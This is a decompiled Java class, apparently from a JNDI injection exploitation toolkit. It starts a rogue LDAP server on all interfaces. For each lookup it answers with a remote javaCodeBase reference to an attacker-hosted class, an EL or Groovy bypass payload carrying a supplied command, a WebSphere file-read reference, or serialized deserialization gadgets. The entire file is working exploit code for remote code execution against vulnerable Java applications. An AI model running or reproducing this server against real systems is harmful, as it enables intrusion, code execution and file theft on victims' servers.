/*
 * Decompiled with CFR 0.152.
 */
package jndi;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import java.net.InetAddress;
import java.net.URL;
import javax.naming.Reference;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import jndi.CommonDeserial;
import jndi.CommonRef;
import org.apache.naming.ResourceRef;
import run.ServerStart;
import util.Mapper;

public class LDAPRefServer
implements Runnable {
    private static final String LDAP_BASE = "dc=example,dc=com";
    private int port;
    private URL codebase_url;
    private String command;

    public LDAPRefServer(int port, URL codebase_url) {
        this.port = port;
        this.codebase_url = codebase_url;
    }

    public LDAPRefServer(int port, URL codebase_url, String command) {
        this.port = port;
        this.codebase_url = codebase_url;
        this.command = command;
    }

    @Override
    public void run() {
        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(new String[]{LDAP_BASE});
            config.setListenerConfigs(new InMemoryListenerConfig[]{new InMemoryListenerConfig("listen", InetAddress.getByName("0.0.0.0"), this.port, ServerSocketFactory.getDefault(), SocketFactory.getDefault(), (SSLSocketFactory)SSLSocketFactory.getDefault())});
            config.addInMemoryOperationInterceptor((InMemoryOperationInterceptor)new OperationInterceptor(this.codebase_url, this.command));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println(ServerStart.getLocalTime() + " [LDAPSERVER] >> Listening on 0.0.0.0:" + this.port);
            ds.startListening();
        }
        catch (Exception e) {
            e.printStackTrace();
        }
    }

    private static class OperationInterceptor
    extends InMemoryOperationInterceptor {
        private URL codebase;
        private String command;

        public OperationInterceptor(URL cb, String command) {
            this.codebase = cb;
            this.command = command;
        }

        public void processSearchResult(InMemoryInterceptedSearchResult result) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                this.sendResult(result, base, e);
            }
            catch (Exception e1) {
                e1.printStackTrace();
            }
        }

        protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e) throws Exception {
            CommonRef commonRef = new CommonRef(this.command);
            CommonDeserial commonDeserial = new CommonDeserial(this.command);
            String cbstring = this.codebase.toString();
            if (base.startsWith("remote")) {
                String javaFactory = Mapper.references.get(base);
                if (javaFactory == null) {
                    System.out.println(ServerStart.getLocalTime() + " [LDAPSERVER] >> Reference that matches the name(" + base + ") is not found.");
                    return;
                }
                URL turl = new URL(cbstring + javaFactory.concat(".class"));
                System.out.println(ServerStart.getLocalTime() + " [LDAPSERVER] [RemoteReference] >> Send remote LDAP reference result for " + base + " redirecting to " + turl);
                e.addAttribute("javaClassName", "foo");
                e.addAttribute("javaCodeBase", cbstring);
                e.addAttribute("objectClass", "javaNamingReference");
                e.addAttribute("javaFactory", javaFactory);
            } else if (base.startsWith("local")) {
                String javaFactory = Mapper.references1.get(base);
                if (javaFactory == null) {
                    System.out.println(ServerStart.getLocalTime() + " [LDAPSERVER] >> Reference that matches the name(" + base + ") is not found.");
                    return;
                }
                if (javaFactory.equals("BypassByEL")) {
                    System.out.printf("%s [LDAPSERVER] [%s] >> Send local LDAP reference result\n", ServerStart.getLocalTime(), javaFactory);
                    e.addAttribute("javaClassName", "java.lang.String");
                    ResourceRef ref = commonRef.execByEL();
                    e.addAttribute("javaSerializedData", commonRef.serialize(ref));
                } else if (javaFactory.equals("BypassByGroovy1")) {
                    System.out.printf("%s [LDAPSERVER] [%s] >> Send local LDAP reference result\n", ServerStart.getLocalTime(), javaFactory);
                    e.addAttribute("javaClassName", "java.lang.String");
                    ResourceRef ref = commonRef.execByGroovy1();
                    e.addAttribute("javaSerializedData", commonRef.serialize(ref));
                } else if (javaFactory.equals("BypassByGroovy2")) {
                    System.out.printf("%s [LDAPSERVER] [%s] >> Send local LDAP reference result\n", ServerStart.getLocalTime(), javaFactory);
                    e.addAttribute("javaClassName", "java.lang.String");
                    ResourceRef ref = commonRef.execByGroovy2();
                    e.addAttribute("javaSerializedData", commonRef.serialize(ref));
                } else if (javaFactory.equals("ReadfileByWebsphere")) {
                    System.out.printf("%s [LDAPSERVER] [%s] >> Send local LDAP reference result\n", ServerStart.getLocalTime(), javaFactory);
                    e.addAttribute("javaClassName", "java.lang.String");
                    Reference ref = commonRef.readfileByWebsphere();
                    e.addAttribute("javaSerializedData", commonRef.serialize(ref));
                }
            } else if (base.startsWith("deserial")) {
                String javaFactory = Mapper.references2.get(base);
                if (javaFactory == null) {
                    System.out.println(ServerStart.getLocalTime() + " [LDAPSERVER] >> Reference that matches the name(" + base + ") is not found.");
                    return;
                }
                String gadgetType = javaFactory.substring(8);
                byte[] bytes = commonDeserial.execByDeserialize(gadgetType, null, false);
                System.out.printf("%s [LDAPSERVER] [%s] >> Send local LDAP reference result\n", ServerStart.getLocalTime(), javaFactory);
                e.addAttribute("javaClassName", "foo");
                e.addAttribute("javaSerializedData", bytes);
            }
            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        }
    }
}

